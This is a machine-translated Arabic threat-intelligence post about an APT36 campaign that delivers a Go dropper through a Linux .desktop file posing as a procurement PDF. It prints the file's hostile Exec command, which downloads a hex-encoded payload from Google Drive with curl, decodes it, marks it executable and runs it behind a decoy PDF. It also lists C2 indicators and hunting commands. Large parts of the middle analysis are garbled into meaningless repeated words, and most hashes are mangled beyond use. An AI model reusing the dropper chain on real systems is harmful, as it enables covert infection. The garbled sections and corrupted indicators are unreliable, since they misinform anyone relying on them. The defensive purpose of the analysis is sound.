إلى الخلف
استخبارات الخصم
جدول المحتوى

ملخص تنفيذي

APT36 - المعروفة أيضًا باسم Transparent Tribe أو Mythic Leopard أو Earth Karkaddan أو Operation C-Major - هي مجموعة تهديدات متقدمة مستمرة (APT) تتخذ من باكستان مقراً لها ونشطت منذ عام 2013 على الأقل. تركز المجموعة بشكل أساسي على أنشطة التجسس الإلكتروني التي تستهدف الكيانات الحكومية الهندية، مع التركيز بشكل خاص على أفراد الدفاع والمنظمات ذات الصلة. تشتهر APT36 بحملات التصيد المستمرة وعمليات جمع بيانات الاعتماد المستخدمة للوصول إلى البيئات الحساسة.

في تحقيقاتنا الأخيرة، لاحظنا وجود تقنية إصابة جديدة تستفيد من ملفات Linux desktop entry (.desktop) كآلية لتسليم البرامج الضارة. يبدأ الهجوم بأرشيف ZIP ضار يحتوي على ملف.desktop متنكرًا في صورة مستند (على سبيل المثال، شراء أجهزة الكمبيوتر المحمولة_والمترافقة_pdf.df.desktop). عند التنفيذ، يقوم المُحمل بتنزيل حمولة قطارة من Google Drive، مخزنة هناك كسلاسل مشفرة سداسيًا. ثم تقوم البرامج الضارة بما يلي:

  1. يقوم بفك تشفير الحمولة السداسية وكتابتها إلى /TMP/Procurement_of_Manportable_ &_compac.pdf-$ (التاريخ +%s) (حيث يوفر التاريخ +%s طابعًا زمنيًا لـ Unix).
  2. يضبط الأذونات وينفذ ثنائي القطارة.
  3. يفتح ملف PDF شرك في Firefox، مما يخلق انطباعًا بأنه تم الوصول إلى مستند شرعي لتقليل شكوك الضحية.

بمجرد بدء التشغيل، تقوم القطارة بإجراء العديد من العمليات:

  • ينفذ عمليات فحص مكافحة التصحيح ومكافحة الحماية.
  • يثبت الثبات على النظام المصاب.
  • يحاول إنشاء اتصال بالبنية الأساسية للأوامر والتحكم (C2) باستخدام WebSockets.

التحليل

شراء أجهزة محمولة ومتوافقة. pdf.zip : يحتوي الملف المضغوط على ملف.desktop للبرامج الضارة

هاش إم دي 5: 6ac0fe0fa5d9af8193610d710a7d63c

هاش SHA1: 3e3169c513c02126028480421 fb341a167cb9fcd

هاش SHA256: 34 إعلان 45374 عمق 5 قدم 5059 صندوق عرض 65 عرض 7057 ec0f3 e468 f00234 be7 ج 34 دي 033093 إفك 4 دي 83 د

بعد فك ضغط الملف المضغوط نحصل على ملف.desktop (شراء أجهزة الكمبيوتر المحمولة _\ &_COMPAC.PDF. سطح المكتب)

هاش إم دي 5: a484 f85d132609 a4a6b5ed65ece7d331

هاش SHA1: 1982f09bf3a6688 bb80249a079db1a759214b7

هاش SHA256: 6347 قدم 46 د 77 أ 47 ب 90789 أ 1209 ب 8 اف 573 ب 2529 أ 6084 اف 858 أ 27 د 977 اف 23 دى 8 ايه 79113

ملف .desktop هو ملف تكوين نص عادي يستخدم بشكل أساسي في بيئات سطح مكتب Linux لتحديد اختصارات التطبيقات ومشغلات التشغيل. يوفر بيانات وصفية حول التطبيق، مثل الاسم والرمز والأمر لتنفيذ البرنامج. تسمح هذه الملفات للتطبيق بالظهور في قوائم النظام أو على سطح المكتب أو في اللوحات، مما يسهل التشغيل من واجهات المستخدم الرسومية.

الشكل 1: ملف.desktop مع رمز pdf ينتحل شخصية ملف pdf حقيقي

يتم إخفاء التعليمات البرمجية الضارة داخل تكوين الأيقونة.

الشكل 2: الكود المخزن في ملف.desktop

تحليل ملف.desktop

  1. بيانات الأيقونة المضمنة

# --- بدء بيانات الرمز المضمنة ---
# IV أو RW 0 كجم GGQD1 AVKI CUBC 7 جيجا بايت HI7 × QWDKI/HWYZY53 AMG1 UZYST9 وحدة المعالجة المركزية 8 فولت JP35 LWANYUW9 OQDG9 OIC
#... (بيانات الصورة المشفرة Base64)...
# --- إنهاء بيانات الرمز المضمنة ---

  • تحتوي هذه الأسطر على صورة رمز مضمنة مشفرة بتنسيق Base64.
  • يتم استخدام هذا الرمز من قبل بيئة سطح مكتب Linux لتمثيل ملف.desktop بشكل مرئي.
  • يساعد تضمين بيانات الرمز على إخفاء الملف كاختصار شرعي لمستند PDF.
  • تخفي البرامج الضارة نفسها «بين» بيانات الرمز أو بجانبها لتجنب الاكتشاف العرضي.

  1. عنوان [إدخال سطح المكتب]

[إدخال سطح المكتب]

  • يحدد بداية تكوين إدخال سطح المكتب وفقًا لمواصفات إدخال سطح المكتب.
  • يشير إلى أن هذا الملف يحدد كيفية تعامل بيئة سطح المكتب مع هذا العنصر (على سبيل المثال، اختصار التطبيق).

  1. حقل الاسم

الاسم = مشتريات_الأجهزة المحمولة_و_المضغوطة.pdf

  • تم تصميم الاسم المعروض لهذا الاختصار ليبدو كملف PDF شرعي.
  • يساعد استخدام اسم مستند معقول في خداع المستخدمين للنقر المزدوج.

  1. إكسيك فيلد

exec=bash -c 'ctfuft=» /TMP/مشتريات_منتقلة_و_COMPAC.pdf-$ (التاريخ +%s)»؛ nilthe= «$ (echo zwfNWEPxjsicr7zwfNWEPxfsiah r0chm6ly9kcml2zs5nb29nguy29nguy29tl3vjp2v4cg9ydd1k3dbg9hzczd0xvrvr0nzhom0twup6vmjfltk1dulmbk84nfd6xy0iHGH HKIC1W | القاعدة 64 -d)»؛ القيمة المضافة «$nilthe» > «$CTFUL» &cmod+x «$CTFUT» و «$CTFUT» و «UQDST="$ (echo zmlyzvecatlw5ldy13aw5kb3cgimh0dhzoi8vzui29vz2xllMnvbs9maWxll2qvmWzll2qvmWzgzg16dzbterzyMzvxg16dzymzg16dzymzg16dzyzg16dzyzg16dzyzg16dzyzg16dzyzg16dzyzg16dzyzg16dzyzg16dzyzg16dzyzg16dzbzeالصفحة الرئيسيةTSEPBURR1L3ZPZXC/DXNWPWPRYAXLX2XPBMSI | base64 -d)»؛ تقييم «$IUQDST» &'

  • هذا هو أمر تنفيذ البرامج الضارة الأساسي الذي يتم تشغيله عند تنفيذ ملف.desktop.

الانهيار:

  • CTFuft هو متغير تم تعيينه لمسار ملف في /tmp/ مع اسم PDF الأصلي الذي تم إلحاقه بالطابع الزمني لـ Unix لإنشاء اسم ملف فريد.
  • يتم تعيين NilThe عن طريق فك تشفير سلسلة مشفرة بـ base64، وهي عبارة عن حمولة مشفرة سداسي. على سبيل المثال، يقوم NilThe بتخزين الأمر التالي

curl --fail --location --أظهر الخطأ "https://drive.google.com/uc?export=download&id=1VQQiTt78N3KpYJzVbE-95uILnO84Wz_ -» | xxd -r -p

  • تتم كتابة هذه الحمولة التي تم فك تشفيرها إلى مسار الملف $ctFuft (/tmp dir).
  • ثم يتم منح الملف أذونات التنفيذ (chmod +x).
  • يتم تنفيذ ملف الحمولة في الخلفية (&).
  • يتم تخزين أمر base64-decoded آخر في iUQDST الذي يقوم بتشغيل Firefox، مما يؤدي إلى فتح عنوان URL لملف PDF مزيف لتضليل المستخدم.

فايرفوكس - نافذة جديدة "https://drive.google.com/file/d/1kn0L_6WYbfUUx0dmzwfALDnzkVHJAPTu/view?usp=drive_link

  • يتم تنفيذ كل من تنفيذ الحمولة وفتح ملف PDF بشكل متزامن.
  • بشكل أساسي، يؤدي هذا إلى تشغيل حمولة ضارة مخفية أثناء عرض مستند شرعي مزيف للضحية.

  1. حقل المحطة

المحطة = خطأ

  • يشير إلى أنه يجب تشغيل الأمر دون فتح نافذة طرفية مرئية.
  • يساعد على إخفاء تنفيذ الهجوم من وجهة نظر المستخدم.

  1. حقل النوع

النوع = التطبيق

  • يعرّف ملف.desktop هذا كمشغل تطبيق.
  • يخبر هذا الحقل النظام أن تنفيذ هذا الملف سيؤدي إلى تشغيل تطبيق أو أمر بدلاً من فتح مجلد أو ارتباط.

  1. أيكون فيلد

الرمز = التطبيق - PDF

  • يحدد الرمز الذي يجب أن تعرضه بيئة سطح المكتب لهذا الملف.
  • قم بتعيينه على أيقونة PDF عامة لإخفاء الملف كمستند بدلاً من ملف قابل للتنفيذ.

  1. مدينة الجية

الفصية= الحياة العادية؛

  • جمعية بيت بيت القربص للجميل.
  • في هذا الصدد، اقرأ المزيد، على سبيل المثال، على سبيل المثال.

  1. صورة الله العليقي - X-GNOME

إين التلماني — إكس جنوم = #RhB

  • مصر - جنوم - مصر - الإسلام - الإسلام - الإسلام - الإسلام - الإسلام - الإسلام - الإسلام - السلام.
  • من جهة أخرى، لا بد أن يكون هناك الكثير من المال على سطح المكتب، في منطقة الشرق الأدنى.

  1. دليل الفن في 1 X

دردج الدين X = عيسى

  • تطبيق تيميل (صورة)، نظام تشغيل لينكس، نظام تشغيل ويندوز، المملكة المتحدة.
  • «من دار السلام» إلى «سورة البقرة» و «مدقنة» في «سورة البقرة».
  1. كتبة السنة الثانية

## --- بدع الله السمينة ---
# Ivborw0kggqmdcytlapgmnafl2BLX+GYT9XEIQFRAD7YP+ESZ18Tsefe3gqqpwxlb2Pjg
#... (قاعدة الفتح 64)...
# --- صفحة المدينة ---

  • قاعدة بيانات حركة المرور (64)، السنة الأولى، تونس، تونس، تونس، حركة المرور، تونس، تونس، تونس، تونس، تونس، فلسطين، فلسطين، فلسطين،،،،،،،،،،،،،،،،،،،،،،،،،،،،،،،،،،،،
  • «عصر القيامة في تونس»

الفصل الثالث: كتاب الشكر pdf

تباب القط (الحومة)

الملف الشخصي: إل إف 64 بت، إل إس بي، باب التعليم، إكس 86-64، #1 (سي.إس.في)، معبر أبو الفضل، مسار [sha1] =508a3568c56ed4f613cfafe23ffe23ff12c81ba627eb، مع معلومات التصحيح، مصر

كيفية إعداد الكتاب المقدس، الحديث عن هذا الكتاب المقدس.

عيد ميلاد 5: 566ddd4eb4ca8d4d4d4d4d4d4d67b72e7f944055

هاش شا1: df4db969a69 efc1db59f4d3c596ed59777

شاه شاه 256: 7a946339439 eb678316 a124b8d700b21de919c81ee5bef33e848 b7183927b

رفع شهادة الثانوية العامة إلى #3 من نتائج الدراسة في العين:

1. أفضل وقت ممكن

  • لا بد من الذهاب إلى الحياة البرية من أجل الحصول على مساعدة من الله تعالى.

2. البوابة الشوية والحضارة للطب

  • وزارة الشؤون الإنسانية مع آل علي.
  • كتاب «صور الحرب العالمية» في المملكة العربية السعودية، المملكة العربية السعودية، المملكة العربية السعودية، المملكة العربية السعودية، المملكة العربية السعودية، المملكة العربية السعودية، المملكة العربية السعودية، المملكة العربية السعودية، المملكة العربية السعودية، المملكة العربية السعودية، المملكة العربية السعودية، المملكة العربية السعودية، المملكة العربية السعودية، المملكة العربية السعودية، المملكة العربية السعودية، المملكة العربية السعودية، المملكة العربية السعودية، المملكة العربية السعودية، المملكة العربية السعودية، المملكة العربية السعودية، المملكة العربية السعودية،
  • صور من مصر إلى الشرق الأقصى من المملكة المتحدة إلى مكة المكملين.

3. في اليوم التالي

  • موقع التواصل الاجتماعي #السعودية #شوق_الله #قطع_الله #لبشكة_لاتصغاره.

4. أنسات اليوم/الثقات

فتح باب على os.args:

في ما يلي os.args = «--hidden»، ثم كلمة المرور إلى:

(من اليمين)

بخلف الدين، كتاب التلك الليبي (من كتاب إلى جانب الذرة والخ القرني):

5. سورة آل سعود

هذه هي الطريقة التي يمكن بها الوصول إلى:

فريق. (*العام). الغنج (...)
شارع بابيا
شارع بابيا

كيفية القيام بما يلي:

«صباح عيد الحفلاء...»

«(ص:...)»
«لا بد من:...»

6. سوق العمل والحمد

كتاب السيرة الذاتية في مصر العربية:

  • قاعدة بيانات 64 ببك الله على عنوان URL الخاص بـ WebSocket (مثل: //seemysitelive [.] store:8080/ws)
  • من الممكن أن يكون هذا هو الحال بالنسبة لي.
  • كتاب «فشال»، «باب العلم» و «السور» و «الشريعة الإسلامية»، و «الشريعة الإسلامية»، و «ج2» («الحياة والشمول»).

7. في سيسيل

  • «من جهة أخرى، بما في ذلك المسجد الحرام» و «عيد المسلمين».

السنيد

كتاب ج2 «مشكاة شكر» يعود تاريخه إلى «جريمة التخفي». دليل مستخدم C2 وتعداد المستخدمين على شبكة الإنترنت (C2)، بالإضافة إلى إمكانية الوصول إلى «خادم التخفي».

الفصل 4.

البحث عن الملكية الفكرية عبر الإنترنت | تعداد السكان الأصليين:

<title>services.http.response.html_tags: «المملكة العربية السعودية - العلاقات العامة»</title>

النت:

  • #تاتو (4) في تاريخ الصلاة.
  • العدد الثالث من سورة الضّورة:
  • 2) التحكم في الموارد البشرية C2 NA.
  • 1) C2 (سورة سبقا، المملكة العربية السعودية، الفصل 36).

الصفحة 2: يزيد من [.] متر مربع

بروتوكل دواليك ج 2:164.215 .103.55 (متقدمي - بني: س 213373؛ آية الكويت)

كتاب «حقوق الإنسان»: «مرحبا بك في عالم التخفي»

الفصل 5. إجمالي عدد الفيروسات في العالم

الفصل 6. السيد عبد الوهاب العقبري

دليل الفصل - APT36

جزيرة آرتيريا

ابحث في جوجل درايف عن طريق جوجل درايف، مصر، مصر، مصر، مصر، مصر، مصر، مصر، مصر، مصر، مصر، مصر، مصر، مصر، مصر، مصر، مصر، مصر، مصر، مصر، المملكة العربية السعودية،

علم الحاسوب في القرم

كتاب «النظام الأساسي» للوثّاث: تركز هجمات APT36 على موظفي الحكومة والدفاع، مما يخاطر بتسرب المعلومات الدفاعية والاستراتيجية الحساسة التي يمكن أن تعرض الأمن القومي والسرية التنظيمية للخطر.

المثابرة الخفية والتهرب: وباستخدام ملفات.desktop المقنعة والتقنيات المتطورة لمكافحة التصحيح/مكافحة الحماية، تظل البرامج الضارة غير مكتشفة على أنظمة Linux، مما يسمح بالوصول غير المصرح به والتجسس لفترات طويلة.

التهديد الأمني لسلسلة التوريد والمشتريات: تستخدم الحملة التصيد الاحتيالي المرتبط بالمشتريات للتسلل إلى المؤسسات، وتسليط الضوء على نقاط الضعف في سير عمل المشتريات والتي يمكن أن تؤدي إلى تعطيل العمليات والاحتيال وفقدان الثقة.

القيادة والتحكم في البروتوكولات غير القياسية: باستخدام اتصالات WebSocket على المنفذ 8080، تحافظ الحملة على إمكانات التحكم عن بعد والتسلل الخفية، مما يعقد جهود الكشف والاستجابة للحوادث.

مؤشرات التسوية (IOCs)

تجزئات الملفات

أرشيف ZIP الضار
اسم الملف: مشتريات_منفذة_و_COMPAC.pdf.zip
MD5:6 تيار متردد 0 قدم 0fa5 عمق 9af8193610 عمق 710a7d63 c
شا1:3e3169c513c02126028480421fb341a167cb9fcd
شا256:34 إعلان 45374 د 5 دي 50 59 دولار كندي 65e7057 ec0f3 e468 f00234 be7 ج 34 دي 033093 إفك 4 د 83 د

ملف .desktop ضار
اسم الملف: مشتريات_منبورتابل_و_COMPAC.pdf.desktop
إم دي 5: سيارة 484f85d132609a4a6b5ed65ece7d331
شا1:1982f09bf3a6688 bb80249a079db1a759214b7
شا256:6347 فولت 46 د 77 أ 47 ب 90789 أ 1209 ب 8 اف 573 ب 25 29 أ 6084 اف 858 أ 27 د 977 بى اف 23 دى 8 ايه 79113

انتقل إلى الحمولة الثنائية
اسم الملف: ELF 64 بت LSB قابل للتنفيذ (حمولة مسقطة)
إم دي 5:566 دي دي دي 4 بي 4 سي 8 دي 4 دي 67 بي 72 إي إي 7 إف 944055
شا1: دي اف 4 دي بي 969 ايه 69 اف سي 1 دي 59 اف 4 دي 3 سي 596 اي دي 590 اي 059777
SHA256:7a946339439 eb678316 a124b8d700b21 de91981eee5 bef 33e8 cb848b7183927 ب

مؤشرات الشبكة

البنية التحتية للقيادة والتحكم

المجال: انظر موقعي مباشرة [.] متجر
الرمز البريدي: 164.215.103.55
ASN: AS 213373 (شركة آي بي كونكت)
البروتوكول: ويبسوكيت (ws://)
المنفذ: 8080
عنوان URL: //seemysitelive [.] المتجر: 8080/ws
الشعار: «مرحبًا بك في خادم ستيلث»

البنية التحتية لتسليم الحمولة

المنصة: جوجل درايف

بريد إلكتروني للمهاجم: bulldark453@gmail.com
نمط عنوان URL: https://drive.google.com/uc?export=download&id=[FILE_ID]
عنوان URL للخداع: https://drive.google.com/file/d/1kn0L_6WYbfUUx0dmzwfALDnzkVHJAPTu/view?usp=drive_link

عناصر نظام الملفات

مواقع إسقاط الحمولة
نمط المسار: /TMP/مشتريات_منقلة_ &_COMPAC.pdf- [TIMESTAMP]
مثال: /TMP/شراء أجهزة محمولة _ و_COMPAC.pdf-1692547200
الأذونات: قابلة للتنفيذ (تم تطبيق chmod +x)

المؤشرات السلوكية

أنماط تنفيذ العمليات
الأمر: bash -c [أوامر BASE64_ENCODED_]
النمط: curl --fail --location --أظهر الخطأ [GOOGLE_DRIVE_URL] | xxd -r -p
العملية: إطلاق Firefox باستخدام عنوان URL لملف PDF شرك
ثنائي: انتقل إلى التنفيذ باستخدام ميزات مكافحة التصحيح

أنماط اتصالات الشبكة

البروتوكول: اتصالات WebSocket بالمنفذ 8080
منطق إعادة المحاولة: فواصل زمنية مدتها 10 ثوانٍ عند فشل الاتصال
وكيل المستخدم: انتقل إلى أنماط عميل HTTP
الثبات: محاولات إعادة الاتصال المستمرة

توصيات العلاج

أمان الشبكة

  • البنية التحتية لبلوك C2
  • أضف متجر seemysitelive [.] و164.215.103.55 إلى قوائم حظر الشبكة
  • مراقبة وحظر اتصالات WebSocket بالمنفذ 8080
  • تنفيذ عملية غرق DNS للمجال الضار

اكتشاف نقطة النهاية

  • ابحث عن تجزئات الملفات عبر جميع أنظمة Linux
  • ابحث عن الملفات في /tmp/ المطابقة لنمط التسمية
  • حدد الأنظمة التي تحتوي على ملفات .desktop المشبوهة

أمان البريد الإلكتروني

  • حظر مرفقات ZIP التي تحتوي على ملفات.desktop
  • تنفيذ مسح إضافي لرسائل البريد الإلكتروني المتعلقة بالمشتريات
  • راجع سجلات البريد الإلكتروني لأنماط المرفقات المماثلة

عمليات الصيد

1. استعلامات البحث عن التهديدات

   

# ابحث عن ملفات.desktop المشبوهة
 ابحث عن/-اسم «*.desktop» -الأحدث [recent_date] -exec grep -l «bash -c» {}\؛
 
 # ابحث عن الحمولات التي تم فك تشفيرها بشكل سداسي
 المجموعة -r «xxd -r -p» /فار/سجل/
 
 # ثنائيات Find Go في المواقع المشبوهة
 ابحث عن /tmp /var/tmp - نوع ملف -exec القابل للتنفيذ {}\؛ | grep «اذهب إلى المبنى»

2. تحليل الذاكرة

- تفريغ ذاكرة عمليات Go المشبوهة

- تحليل اتصالات WebSocket في الذاكرة

- تحقق من بيانات التكوين المضمنة

الملحق

ATT&CK Tactics and Techniques

ATT&CK Tactic ATT&CK Technique ID Technique Name Description / Relevance
Initial Access T1566 Phishing Delivery via phishing ZIP attachments containing malicious .desktop files
Execution T1204.002 User Execution: Malicious File Execution of disguised .desktop files by users
T1064 Scripting Use of bash script commands in the .desktop Exec field to download payload
Persistence T1543.003 Create or Modify System Process: Systemd Service Persistence via autostart .desktop files and likely cron/systemd services
T1564.001 Hide Artifacts: Hidden Files and Directories Dropping payload in hidden /tmp with obfuscation
Defense Evasion T1036 Masquerading Disguising malware as legitimate PDF shortcuts with icon spoofing
T1027.001 Obfuscated Files or Information: Binary Padding Large base64 icon data to hide malicious commands
Credential Access T1110 Brute Force / Credential Dumping (common in APT36 campaigns) Credential harvesting focus in broader APT36 operations
Discovery T1518 Software Discovery Reconnaissance on victim environment (host info gathering)
Command and Control T1071 Application Layer Protocol Using WebSocket protocol for C2 communications
T1095 Non-Application Layer Protocol WebSocket is a non-standard C2 communication
T1105 Ingress Tool Transfer Downloading payload from Google Drive
T1571 Non-Standard Port C2 over uncommon port 8080 using WebSocket

مرجع

https://x.com/SinghSoodeep/status/1955860231109665108

أيوش بانوار
Cybersecurity Consultant who loves hacking, breaking things, and learning new ways to secure them.
لم يتم العثور على أية عناصر.

مدونات ذات صلة